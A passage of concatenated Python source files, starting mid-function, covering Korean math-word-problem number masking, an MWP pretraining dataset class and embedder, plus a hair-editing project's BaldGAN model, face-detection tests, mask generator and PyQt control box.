q_ += i[0][prior_end:p.start()]
q_ += f' NUM_{cnt} '
cnt += 1
q_ += p.group(7)
prior_end = p.end()
else:
# quantity라고 하는데 number token으로 masking할 문자열을 찾지 못한 경우.
pass
q_ += i[0][prior_end:]
else:
q_ += i[0]
new_numbers = []
for i in numbers:
if (i == '한') or (i == '첫'):
new_numbers.append('1')
elif (i == '두') or (i == '둘'):
new_numbers.append('2')
elif (i == '세') or (i == '셋'):
new_numbers.append('3')
elif (i == '네') or (i == '넷'):
new_numbers.append('4')
elif (i == '다섯'):
new_numbers.append('5')
elif (i == '여섯'):
new_numbers.append('6')
elif (i == '일곱'):
new_numbers.append('7')
elif (i == '여덟'):
new_numbers.append('8')
elif (i == '아홉'):
new_numbers.append('9')
elif (i == '열'):
new_numbers.append('10')
else:
new_numbers.append(i.replace(',',''))
if not new_numbers:
new_numbers = ['0']
q_ += ' NUM_0'
return re.sub("\s+" , " ", q_), new_numbers
# q = '어떤 소수의 소수점을 오른쪽으로 한자리 옮기면 원래보다 2.7만큼 커집니다. 원래의 소수를 구하시오.'
# q1 = '어떤 소수의 소수점을 오른쪽으로 한 자리 옮기면 원래보다 2.7/234만큼 커집니다. 원래의 소수를 구하시오.'
# q2 = '5개의 수 1.4, 9/10, 1.1, 0.5, 13/10이 있습니다. 이 중에서 0.9보다 큰 수는 모두 몇 개입니까?'
# q3 = '5,000부터 1,050,000까지의 수 중에서 2,000원 배수가 아닌 두 사람들의 합을 구하시오 첫 번째.'
# tk = Pororo(task='ner', lang='ko')
# a,b = ner_quantity(q, tk)
# print(a,b)
# a,b = ner_quantity(q1, tk)
# print(a,b)
# a,b = ner_quantity(q2, tk)
# print(a,b)
# a,b = ner_quantity(q3, tk)
# print(a,b)
# 어떤 소수의 소수점을 오른쪽으로 number0 자리 옮기면 원래보다 number1 만큼 커집니다. 원래의 소수를 구하시오. ['한', '2.7']
# 어떤 소수의 소수점을 오른쪽으로 number0 자리 옮기면 원래보다 number1 만큼 커집니다. 원래의 소수를 구하시오. ['한', '2.7']
# number0 개의 수 number1 , number2 , number3 , number4 , number5 이 있습니다. 이 중에서 number6 보다 큰 수는 모두 몇 개입니까? ['5', '1.4', '9/10', '1.1', '0.5', '13/10', '0.9']
# +
def sheet2json_main(args):
data_path = args.data_path
eval_path = args.eval_path
pathlib.Path(eval_path).mkdir(parents=True, exist_ok=True)
with open(data_path, encoding='utf-8-sig') as f:
data = json.load(f)
total_question_length = len(data)+1
tk = Pororo(task='ner', lang='ko')
problem_list = []
for i in range(1, total_question_length):
q_dict = {}
# mask_question, num_list = transfer_digit_to_str(data[str(i)]['question'])
mask_question, num_list = ner_quantity(data[str(i)]['question'], tk)
q_dict['Question'] = mask_question
q_dict['Numbers'] = " ".join(num_list)
q_dict['Answer'] = 1
q_dict['Equation'] = "- NUM_0 NUM_1"
q_dict['ID']=str(i)
problem_list.append(q_dict)
with open(eval_path+'testset.json', 'w', encoding='utf-8-sig') as f:
json.dump(problem_list, f, indent="\t")
with open(eval_path+'trainset.json', 'w', encoding='utf-8-sig') as f:
json.dump([], f, indent="\t")
with open(eval_path+'validset.json', 'w', encoding='utf-8-sig') as f:
json.dump([], f, indent="\t")
```
#### File: data/dataset/pretrain_dataset.py
```python
import os
import copy
import warnings
from logging import getLogger
import torch
from transformers import ElectraTokenizer,RobertaTokenizer,BertTokenizer
from mwptoolkit.data.dataset.abstract_dataset import AbstractDataset
from mwptoolkit.utils.enum_type import DatasetName, MaskSymbol, NumMask,TaskType,FixType,Operators,SpecialTokens
from mwptoolkit.utils.preprocess_tools import id_reedit
from mwptoolkit.utils.preprocess_tool.equation_operator import from_infix_to_multi_way_tree
from mwptoolkit.utils.preprocess_tool.equation_operator import from_infix_to_postfix, from_infix_to_prefix, from_postfix_to_infix, from_postfix_to_prefix, from_prefix_to_infix, from_prefix_to_postfix
from mwptoolkit.utils.preprocess_tool.sentence_operator import deprel_tree_to_file, get_group_nums_, span_level_deprel_tree_to_file, get_span_level_deprel_tree_, get_deprel_tree_
from mwptoolkit.utils.preprocess_tool.number_transfer import number_transfer
class PretrainDataset(AbstractDataset):
"""dataset class for pre-train model.
"""
def __init__(self, config):
"""
Args:
config (mwptoolkit.config.configuration.Config)
expected that config includes these parameters below:
task_type (str): [single_equation | multi_equation], the type of task.
embedding (str|None): embedding module name, use pre-train model as embedding module, if None, not to use pre-train model.
rule1 (bool): convert equation according to rule 1.
rule2 (bool): convert equation according to rule 2.
parse_tree_file_name (str|None): the name of the file to save parse tree infomation.
pretrained_model (str|None): road path of pretrained model.
model (str): model name.
dataset (str): dataset name.
equation_fix (str): [infix | postfix | prefix], convert equation to specified format.
dataset_path (str): the road path of dataset folder.
language (str): a property of dataset, the language of dataset.
single (bool): a property of dataset, the equation of dataset is single or not.
linear (bool): a property of dataset, the equation of dataset is linear or not.
source_equation_fix (str): [infix | postfix | prefix], a property of dataset, the source format of equation of dataset.
rebuild (bool): when loading additional dataset infomation, this can decide to build infomation anew or load infomation built before.
validset_divide (bool): whether to split validset. if True, the dataset is split to trainset-validset-testset. if False, the dataset is split to trainset-testset.
mask_symbol (str): [NUM | number], the symbol to mask numbers in equation.
min_word_keep (int): in dataset, words that count greater than the value, will be kept in input vocabulary.
min_generate_keep (int): generate number that count greater than the value, will be kept in output symbols.
symbol_for_tree (bool): build output symbols for tree or not.
share_vocab (bool): encoder and decoder of the model share the same vocabulary, often seen in Seq2Seq models.
k_fold (int|None): if it's an integer, it indicates to run k-fold cross validation. if it's None, it indicates to run trainset-validset-testset split.
read_local_folds (bool): when running k-fold cross validation, if True, then loading split folds from dataset folder. if False, randomly split folds.
shuffle (bool): whether to shuffle trainset before training.
"""
super().__init__(config)
self.task_type=config['task_type']
self.rule1=config['rule1']
self.rule2=config['rule2']
self.embedding=config['embedding']
self.pretrained_model_path=config['pretrained_model_path']
self.parse_tree_path = config['parse_tree_file_name']
if self.parse_tree_path != None:
self.parse_tree_path = self.dataset_path + '/' + self.parse_tree_path + '.json'
if not os.path.isabs(self.parse_tree_path):
self.parse_tree_path = os.path.join(self.root,self.parse_tree_path)
def _preprocess(self):
if self.dataset in [DatasetName.hmwp]:
self.trainset,self.validset,self.testset = id_reedit(self.trainset, self.validset, self.testset)
transfer = number_transfer
self.trainset, generate_list, train_copy_nums,unk_symbol = transfer(self.trainset, self.dataset, self.task_type, self.mask_symbol, self.min_generate_keep,";")
self.validset, _g, valid_copy_nums,_ = transfer(self.validset, self.dataset, self.task_type, self.mask_symbol, self.min_generate_keep,";")
self.testset, _g, test_copy_nums,_ = transfer(self.testset, self.dataset, self.task_type, self.mask_symbol, self.min_generate_keep,";")
target_equation_fix=self.equation_fix if self.equation_fix else FixType.Infix
source_equation_fix=self.source_equation_fix if self.source_equation_fix else FixType.Infix
if self.rule1:
if source_equation_fix != FixType.Infix:
warnings.warn("non-infix-equation datasets may not surport en rule1 process, already ignored it. ")
elif self.linear and self.single:
self.en_rule1_process(k=max([train_copy_nums, valid_copy_nums, test_copy_nums]))
else:
warnings.warn("non-linear or non-single datasets may not surport en rule1 process, already ignored it. ")
#raise Warning("non-linear or non-single datasets may not surport en rule1 process, already ignored it. ")
if self.rule2:
if source_equation_fix != FixType.Infix:
warnings.warn("non-infix-equation datasets may not surport en rule2 process, already ignored it. ")
elif self.linear and self.single:
self.en_rule2_process()
else:
warnings.warn("non-linear or non-single datasets may not surport en rule2 process, already ignored it. ")
#raise Warning("non-linear or non-single datasets may not surport en rule2 process, already ignored it. ")
if source_equation_fix == target_equation_fix:
fix = None
elif source_equation_fix == FixType.Infix and target_equation_fix == FixType.Prefix:
fix = from_infix_to_prefix
elif source_equation_fix == FixType.Infix and target_equation_fix == FixType.Postfix:
fix = from_infix_to_postfix
elif source_equation_fix == FixType.Prefix and target_equation_fix == FixType.Postfix:
fix = from_prefix_to_postfix
elif source_equation_fix == FixType.Prefix and target_equation_fix == FixType.Infix:
fix = from_prefix_to_infix
elif source_equation_fix == FixType.Postfix and target_equation_fix == FixType.Infix:
fix = from_postfix_to_infix
elif source_equation_fix == FixType.Postfix and target_equation_fix == FixType.Prefix:
fix = from_postfix_to_prefix
elif source_equation_fix == FixType.Infix and target_equation_fix == FixType.MultiWayTree:
fix = from_infix_to_multi_way_tree
else:
raise NotImplementedError("the type of equation fix ({}) is not implemented.".format(self.equation_fix))
self.fix_process(fix)
self.operator_mask_process()
self.generate_list = unk_symbol + generate_list
if self.symbol_for_tree:
self.copy_nums = max([train_copy_nums, valid_copy_nums, test_copy_nums])
else:
self.copy_nums = train_copy_nums
if self.task_type==TaskType.SingleEquation:
self.operator_list = copy.deepcopy(Operators.Single)
elif self.task_type==TaskType.MultiEquation:
self.operator_list = copy.deepcopy(Operators.Multi)
self.operator_nums = len(self.operator_list)
self.unk_symbol = unk_symbol
# graph preprocess
use_gpu = True if self.device == torch.device('cuda') else False
if self.model.lower() in ['graph2treeibm']:
if os.path.exists(self.parse_tree_path) and not self.rebuild:
logger = getLogger()
logger.info("read deprel tree infomation from {} ...".format(self.parse_tree_path))
self.trainset, self.validset, self.testset, token_list =\
get_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
else:
logger = getLogger()
logger.info("build deprel tree infomation to {} ...".format(self.parse_tree_path))
deprel_tree_to_file(self.trainset, self.validset, self.testset, \
self.parse_tree_path, self.language, use_gpu)
self.trainset, self.validset, self.testset, token_list =\
get_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
if self.model.lower() in ['hms']:
if os.path.exists(self.parse_tree_path) and not self.rebuild:
logger = getLogger()
logger.info("read span-level deprel tree infomation from {} ...".format(self.parse_tree_path))
self.trainset, self.validset, self.testset, self.max_span_size =\
get_span_level_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
else:
logger = getLogger()
logger.info("build span-level deprel tree infomation to {} ...".format(self.parse_tree_path))
span_level_deprel_tree_to_file(self.trainset, self.validset, self.testset, \
self.parse_tree_path, self.language, use_gpu)
self.trainset, self.validset, self.testset, self.max_span_size =\
get_span_level_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
if self.model.lower() in ['graph2tree']:
if os.path.exists(self.parse_tree_path) and not self.rebuild:
logger = getLogger()
logger.info("read deprel tree infomation from {} ...".format(self.parse_tree_path))
self.trainset, self.validset, self.testset =\
get_group_nums_(self.trainset, self.validset, self.testset, self.parse_tree_path)
else:
logger = getLogger()
logger.info("build deprel tree infomation to {} ...".format(self.parse_tree_path))
deprel_tree_to_file(self.trainset, self.validset, self.testset, \
self.parse_tree_path, self.language, use_gpu)
self.trainset, self.validset, self.testset =\
get_group_nums_(self.trainset, self.validset, self.testset, self.parse_tree_path)
# if self.model.lower() in ["ept"]:
# logger = getLogger()
# logger.info("build ept information ···")
# self.trainset, self.validset, self.testset = \
# preprocess_ept_dataset_(self.trainset, self.validset, self.testset, self.dataset)
def _build_vocab(self):
if self.embedding=='bert':
tokenizer=BertTokenizer.from_pretrained(self.pretrained_model_path)
elif self.embedding=='roberta':
tokenizer=RobertaTokenizer.from_pretrained(self.pretrained_model_path)
elif self.embedding=='koelectra':
tokenizer=ElectraTokenizer.from_pretrained(self.pretrained_model_path)
elif self.embedding=='ko-roberta':
tokenizer=BertTokenizer.from_pretrained(self.pretrained_model_path)
else:
raise NotImplementedError
# if self.mask_symbol==MaskSymbol.NUM:
# tokenizer.add_tokens(['NUM'])
# elif self.mask_symbol==MaskSymbol.number:
# tokenizer.add_tokens(NumMask.number[:self.copy_nums])
#tokenizer.special_tokens_map.update({'pad_token':SpecialTokens.PAD_TOKEN})
if self.model.lower() in ['trnn']:
tokenizer.add_tokens(self.generate_list)
global SpecialTokens
SpecialTokens.PAD_TOKEN=tokenizer.pad_token
SpecialTokens.SOS_TOKEN=tokenizer.bos_token
SpecialTokens.EOS_TOKEN=tokenizer.eos_token
SpecialTokens.UNK_TOKEN=tokenizer.unk_token
if self.embedding == 'bert':
SpecialTokens.SOS_TOKEN=tokenizer.cls_token
SpecialTokens.EOS_TOKEN=tokenizer.sep_token
self.tokenizer=tokenizer
self.in_idx2word = list(tokenizer.get_vocab().keys())
if self.symbol_for_tree:
self._build_symbol_for_tree()
self._build_template_symbol_for_tree()
elif self.equation_fix == FixType.MultiWayTree:
self._build_symbol_for_multi_way_tree()
self._build_template_symbol_for_multi_way_tree()
else:
self._build_symbol()
self._build_template_symbol()
# if self.share_vocab:
# for symbol in self.out_idx2symbol:
# if symbol in self.in_idx2word:
# continue
# else:
# self.in_idx2word.append(symbol)
# for symbol in self.out_idx2symbol:
# if symbol in self.in_idx2word:
# continue
# else:
# self.in_idx2word.append(symbol)
self.in_word2idx = {}
self.out_symbol2idx = {}
self.temp_symbol2idx = {}
for idx, word in enumerate(self.in_idx2word):
self.in_word2idx[word] = idx
for idx, symbol in enumerate(self.out_idx2symbol):
self.out_symbol2idx[symbol] = idx
for idx, symbol in enumerate(self.temp_idx2symbol):
self.temp_symbol2idx[symbol] = idx
def _build_symbol_for_tree(self):
self.out_idx2symbol = copy.deepcopy(self.operator_list)
self.num_start = len(self.out_idx2symbol)
self.out_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
if self.mask_entity:
mask_list = NumMask.entity
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_etys)]
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_symbol_for_multi_way_tree(self):
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN, SpecialTokens.SOS_TOKEN, SpecialTokens.EOS_TOKEN, SpecialTokens.NON_TOKEN]
self.out_idx2symbol += self.operator_list
self.num_start = len(self.out_idx2symbol)
self.out_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_symbol(self):
if self.share_vocab:
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.EOS_TOKEN] + self.operator_list
else:
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.SOS_TOKEN] + [SpecialTokens.EOS_TOKEN] + self.operator_list
if self.model.lower() in ['hms']:
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.EOS_TOKEN] + self.operator_list
self.num_start = len(self.out_idx2symbol)
self.out_idx2symbol += self.generate_list
if self.model.lower() in ['hms']:
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
for data in self.trainset:
words_list = data["equation"]
for word in words_list:
if word in self.out_idx2symbol:
continue
elif word[0].isdigit():
continue
elif (word[0].isalpha() or word[0].isdigit()) is not True:
self.out_idx2symbol.insert(self.num_start, word)
self.num_start += 1
continue
else:
self.out_idx2symbol.append(word)
if self.model.lower() in ['hms']:
return
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_template_symbol_for_multi_way_tree(self):
self.temp_idx2symbol = [SpecialTokens.PAD_TOKEN, SpecialTokens.SOS_TOKEN, SpecialTokens.EOS_TOKEN, SpecialTokens.NON_TOKEN, SpecialTokens.OPT_TOKEN]
self.temp_num_start = len(self.temp_idx2symbol)
self.temp_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
self.temp_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_template_symbol(self):
if self.share_vocab:
self.temp_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.EOS_TOKEN] + [SpecialTokens.OPT_TOKEN]
else:
self.temp_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.SOS_TOKEN] + [SpecialTokens.EOS_TOKEN] + [SpecialTokens.OPT_TOKEN]
self.temp_num_start = len(self.temp_idx2symbol)
self.temp_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
for data in self.trainset:
words_list = data["template"]
for word in words_list:
if word in self.temp_idx2symbol:
continue
elif word[0].isdigit():
continue
elif (word[0].isalpha() or word[0].isdigit()) is not True:
self.temp_idx2symbol.insert(self.temp_num_start, word)
self.temp_num_start += 1
continue
else:
self.temp_idx2symbol.append(word)
self.temp_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_template_symbol_for_tree(self):
self.temp_idx2symbol = [SpecialTokens.OPT_TOKEN]
self.temp_num_start = len(self.temp_idx2symbol)
self.temp_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
self.temp_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _update_vocab(self, vocab_list):
index = len(self.in_idx2word)
for word in vocab_list:
if word not in self.in_idx2word:
self.in_idx2word.append(word)
self.in_word2idx[word] = index
index += 1
def get_vocab_size(self):
"""
Returns:
(tuple(int, int)): the length of input vocabulary and output symbols
"""
return len(self.in_idx2word), len(self.out_idx2symbol)
```
#### File: module/Embedder/koelectra_embedder.py
```python
import torch
from torch import nn
from transformers import ElectraModel
class KoElectraEmbedder(nn.Module):
def __init__(self,input_size,pretrained_model_path):
super(KoElectraEmbedder,self).__init__()
self.koelectra=ElectraModel.from_pretrained(pretrained_model_path)
def forward(self,input_seq,attn_mask):
output=self.koelectra(input_seq,attention_mask = attn_mask)[0]
return output
def token_resize(self,input_size):
self.koelectra.resize_token_embeddings(input_size)
``` |
{
"source": "jinwoo1225/HAiR",
"score": 3
} |
#### File: HAiR/models/baldgan.py
```python
import os
import urllib
import cv2
import keras.backend as K
import matplotlib.pyplot as plt
import numpy as np
from tensorflow.keras.layers import GlobalAveragePooling2D, multiply, Permute
from tensorflow.keras.layers import Input, Dense, Reshape, Dropout, Concatenate
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from tensorflow.keras.models import Model
from keras_contrib.layers.normalization.instancenormalization import InstanceNormalization
from skimage import transform as trans
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
model_path = BASE_DIR + "/checkpoints/baldgan/"
model_paths = {
# 'D': model_path + 'model_D_5_170.hdf5',
# 'D_mask': model_path + 'model_D_mask_5_170.hdf5',
'G': model_path + 'model_G_5_170.hdf5'
}
class BaldGAN:
def __init__(self):
if not os.path.isdir(model_path):
print("baldGAN : failed to find exact folder, creating...")
os.mkdir(model_path)
if not os.path.isfile(model_paths['G']):
print("baldGAN : failed to find model, downloading...")
url = 'https://jinwoo17962.synology.me/datasets/baldgan/model_G_5_170.hdf5'
urllib.request.urlretrieve(url, model_paths['G'])
K.set_learning_phase(0)
# Image input
d0 = Input(shape=(256, 256, 3))
gf = 64
# Downsampling
d1 = conv2d(d0, gf, bn=False, se=True)
d2 = conv2d(d1, gf * 2, se=True)
d3 = conv2d(d2, gf * 4, se=True)
d4 = conv2d(d3, gf * 8)
d5 = conv2d(d4, gf * 8)
a1 = atrous(d5, gf * 8)
# Upsampling
u3 = deconv2d(a1, d4, gf * 8)
u4 = deconv2d(u3, d3, gf * 4)
u5 = deconv2d(u4, d2, gf * 2)
u6 = deconv2d(u5, d1, gf)
u7 = UpSampling2D(size=2)(u6)
output_img = Conv2D(3, kernel_size=4, strides=1, padding='same', activation='tanh')(u7)
self.model = Model(d0, output_img)
self.model.load_weights(model_paths['G'])
def go_bald(self, image: np.ndarray):
input_face = np.expand_dims(image, axis=0)
input_face = (input_face / 127.5) - 1.
result = self.model.predict(input_face)[0]
result = ((result + 1.) * 127.5)
result = result.astype(np.uint8)
return result
def squeeze_excite_block(input, ratio=4):
init = input
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
filters = init.shape[channel_axis]
se_shape = (1, 1, filters)
se = GlobalAveragePooling2D()(init)
se = Reshape(se_shape)(se)
se = Dense(filters // ratio, activation='relu', kernel_initializer='he_normal', use_bias=False)(se)
se = Dense(filters, activation='sigmoid', kernel_initializer='he_normal', use_bias=False)(se)
if K.image_data_format() == 'channels_first':
se = Permute((3, 1, 2))(se)
x = multiply([init, se])
return x
def conv2d(layer_input, filters, f_size=4, bn=True, se=False):
d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)
d = LeakyReLU(alpha=0.2)(d)
if bn:
d = InstanceNormalization()(d)
if se:
d = squeeze_excite_block(d)
return d
def deconv2d(layer_input, skip_input, filters, f_size=4, dropout_rate=0):
u = UpSampling2D(size=2)(layer_input)
u = Conv2D(filters, kernel_size=f_size, strides=1, padding='same', activation='relu')(u)
if dropout_rate:
u = Dropout(dropout_rate)(u)
u = InstanceNormalization()(u)
u = Concatenate()([u, skip_input])
return u
def atrous(layer_input, filters, f_size=4, bn=True):
a_list = []
for rate in [2, 4, 8]:
# a = AtrousConvolution2D(filters, f_size, atrous_rate=rate, border_mode='same')(layer_input)
a = Conv2D(filters, kernel_size=f_size, dilation_rate=rate, padding='same')(layer_input)
a_list.append(a)
a = Concatenate()(a_list)
a = LeakyReLU(alpha=0.2)(a)
if bn:
a = InstanceNormalization()(a)
return a
```
#### File: BoundingBox/__test__/test_BoundingBox.py
```python
import unittest
import cv2
from src.components.BoundingBox.BoundingBox import BoundingBox
class TestBoundingBox(unittest.TestCase):
def test_BoundingBox(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1.jpg'))
self.assertIsNotNone(bb.get_bounding_box())
def test_assert_off_axis_left_upper(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_left_upper.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_off_axis_left_lower(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_left_lower.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_off_axis_right_upper(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_right_upper.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_off_axis_right_lower(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_right_lower.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_no_face(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_noface.jpg'))
with self.assertRaisesRegex(ValueError, "NoFaceError"):
bb.get_bounding_box()
if __name__ == '__main__':
unittest.main()
```
#### File: components/MaskOrientGenerator/MaskOrientGenerator.py
```python
import numpy as np
from src.components.MaskOrientGenerator.calOrient import Orient
from src.components.MaskOrientGenerator.faceSegmentation import FaceSegmentation
class MaskOrientGenerator:
faceSegmentation = FaceSegmentation()
orient = Orient()
def generate(self, aligned_scaled_patch: np.ndarray) -> tuple:
'''
512 * 512 크기의 aligned_scaled_patch로 부터 마스크와 오리엔트 덴스를 반환합니다.
param aligned_scaled_patch : align과 scale이 수행된 512 * 512 크기의 이미지
return mask : aligned_scaled_patch의 마스크 이미지
orient : aligned_scaled_patch의 오리엔트 덴스
'''
mask = self.generate_mask(aligned_scaled_patch)
orient = self.generate_orient(aligned_scaled_patch, mask)
return mask, orient
def generate_mask(self, image: np.ndarray) -> np.ndarray:
'''
512 * 512 원본 이미지로 부터 마스크 이미지를 반환합니다.
param image : 원본 이미지
return : image의 마스크
'''
return MaskOrientGenerator.faceSegmentation.image_to_mask(image, 256, 512)
def generate_orient(self, image: np.ndarray, mask: np.ndarray) -> np.ndarray:
'''
512 * 512 마스크 이미지로 부터 오리엔트 덴스를 반환합니다.
param image : 원본 이미지
mask : 원본 이미지의 마스크
return : image의 orient dense
'''
return MaskOrientGenerator.orient.makeOrient(image, mask)
```
#### File: util/UserInterface/ControlBox.py
```python
from PyQt5 import QtCore
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtGui import QFont
from PyQt5.QtWidgets import QVBoxLayout, QPushButton, QLabel
RIGHT_BOX_WIDTH = 400
RIGHT_BOX_HEIGHT = int(RIGHT_BOX_WIDTH * 0.5625)
class ControlBox(QVBoxLayout):
result = pyqtSignal()
transform = pyqtSignal()
close = pyqtSignal()
def __init__(self):
super(ControlBox, self).__init__()
self.setAlignment(QtCore.Qt.AlignCenter)
self.progress_label = QLabel()
self.progress_label.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.progress_label.setAlignment(QtCore.Qt.AlignCenter)
font = QFont()
font.setWeight(64)
font.setPointSize(18)
self.progress_label.setFont(font)
self.set_ready()
self.transform_button = QPushButton("변환")
self.transform_button.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.transform_button.clicked.connect(self.transform_signal)
self.transform_button.setFont(font)
self.result_button = QPushButton("결과보기")
self.result_button.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.result_button.clicked.connect(self.result_signal)
self.result_button.setFont(font)
self.result_button.setDisabled(True)
self.close_button = QPushButton("종료")
self.close_button.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.close_button.clicked.connect(self.close_signal)
self.close_button.setFont(font)
self.addWidget(self.progress_label)
self.addWidget(self.transform_button)
